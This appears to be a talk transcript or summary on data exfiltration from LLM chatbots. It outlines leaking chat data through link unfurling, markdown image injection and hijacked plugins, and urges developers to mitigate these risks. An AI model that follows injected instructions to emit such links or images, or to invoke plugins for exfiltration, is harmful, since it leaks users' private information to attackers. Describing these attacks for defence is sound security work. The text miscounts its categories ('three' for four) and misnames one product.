Hello everybody, let’s talk about data exfiltration in large language model applications. Specifically, we’re going to focus on chat bots such as Bing chat, chatGPT, and Cloud.
There are three categories of ways data can be exploited in these applications: hyperlinks, unfurling, markdown injections, and plugins. Let’s take a closer look at each of these categories.
Hyperlinks and unfurling involve the insertion of hyperlinks into chat conversations. When these hyperlinks are emitted, chat applications like Slack or Microsoft Teams connect to them to retrieve data and display a preview in the chat. Attackers can append additional data to these hyperlinks, allowing them to exfiltrate information from past chat conversations.
Markdown injections work similarly to hyperlinks, but instead of inserting hyperlinks, attackers insert image markdown syntax. Chatbots that support markdown rendering will display the image, which can be used to exfiltrate data from the chat context.
Plugins extend the capabilities of chatbots by allowing them to retrieve data from the internet or read emails. However, these plugins can also be exploited for data exfiltration. Attackers can take control of the conversation and invoke plugins to retrieve and exfiltrate sensitive information.
These vulnerabilities pose a significant risk to data security in large language model applications. It is crucial for developers and vendors to address these issues and implement proper security measures to protect user data.
In conclusion, data exfiltration in large language model applications, particularly in chat bots, is a serious concern. The exploitation of hyperlinks, unfurling, markdown injections, and plugins can lead to the unauthorized access and exfiltration of sensitive information. It is essential for developers and users to be aware of these vulnerabilities and take appropriate measures to mitigate the risks.
